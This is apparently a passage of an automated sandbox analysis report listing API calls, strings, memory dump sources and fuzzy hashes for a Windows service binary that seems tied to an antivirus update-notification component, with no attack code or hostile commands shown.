                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                          • Instruction ID: 8412997f68514eaa03bf3c0bb3853e6575d94c669637f8d731f0cfa8b3bc2753
                          • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                          • Instruction Fuzzy Hash: D3118465B28AC1C2E7518F66EC4832D72A0FB88BE4F084275EADD67794CF3CD5548744
                          APIs
                          • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                          • CreateEventW.KERNEL32 ref: 00000001400012C0
                            • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                            • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                            • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                            • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                            • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                            • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                            • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                            • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                            • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                            • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                            • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                          • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                          • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                            • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                            • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                            • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                            • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                            • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                            • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                            • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                            • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                            • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                            • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                            • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                            • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                            • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                            • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                            • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                            • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                            • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                          • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                          • String ID: vseamps
                          • API String ID: 3197017603-3944098904
                          • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                          • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                          • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                          • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Messagesprintf_s
                          • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                          • API String ID: 2642950106-3610746849
                          • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                          • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                          • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                          • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$FreeProcess
                          • String ID:
                          • API String ID: 3859560861-0
                          • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                          • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                          • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                          • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$FreeProcess
                          • String ID:
                          • API String ID: 3859560861-0
                          • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                          • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                          • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                          • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                          APIs
                          • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                          • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                          • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: StringType$ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 319667368-0
                          • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                          • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                          • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                          • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                          APIs
                          • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                          • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                            • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                          • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                          • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                          • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                          • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                          • String ID:
                          • API String ID: 1390108997-0
                          • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                          • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                          • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                          • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 3523768491-393685449
                          • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                          • Instruction ID: 7b2c76bb48ca57ebb40ccdd6a591b855a64f6aa99947e54b67314dbd7bae6525
                          • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                          • Instruction Fuzzy Hash: A1E190B6A087C28AE7129F35D8C82AD77A0FB45748F184276DADD67A56DF38E481C700
                          APIs
                          • GetLastError.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B095CB
                          • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B09601
                          • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B0962E
                          • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B0963F
                          • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B09650
                          • SetLastError.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B0966B
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Value$ErrorLast
                          • String ID:
                          • API String ID: 2506987500-0
                          • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                          • Instruction ID: 35238c8a1c117beeb3cc9dd2d6e724ced465c93e942b4306dcb6866649d9e683
                          • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                          • Instruction Fuzzy Hash: 63115BA8B0C2C245FA56AB31DDD913D21629F587B0F4C43B5E8EE266E6EE2CE4418300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                          • String ID:
                          • API String ID: 3326452711-0
                          • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                          • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                          • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                          • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeaveTimerWaitable
                          • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                          • API String ID: 2984211723-1229430080
                          • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                          • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                          • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                          • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                          • Instruction ID: dfd45076b07fd7aa7fffdcdbc3af6f7ae73b58e8dd51c5819bd5e3b0d907ecdf
                          • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                          • Instruction Fuzzy Hash: 0AF044A9F1968681EA128F34EC4D33DA320AF45761F580375CAED595E4DF2CD049C740
                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                          • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                          • ExitProcess.KERNEL32 ref: 0000000140008545
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: AddressExitHandleModuleProcProcess
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 75539706-1276376045
                          • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                          • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                          • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                          • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                          • Instruction ID: 44a8e325e4d6143c12ec05646d2046e237ed5b52870968507412a13ae90b644c
                          • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                          • Instruction Fuzzy Hash: 36B19FA9F0A6C681EA67DE71D8C823D6690AF54B84F0D84B5DECC27795DE3CE4418B40
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: FileInfoSleepStartupType
                          • String ID:
                          • API String ID: 1527402494-0
                          • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                          • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                          • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                          • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CommandLine$ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 3078728599-0
                          • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                          • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                          • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                          • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                          • String ID:
                          • API String ID: 1850339568-0
                          • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                          • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                          • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                          • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
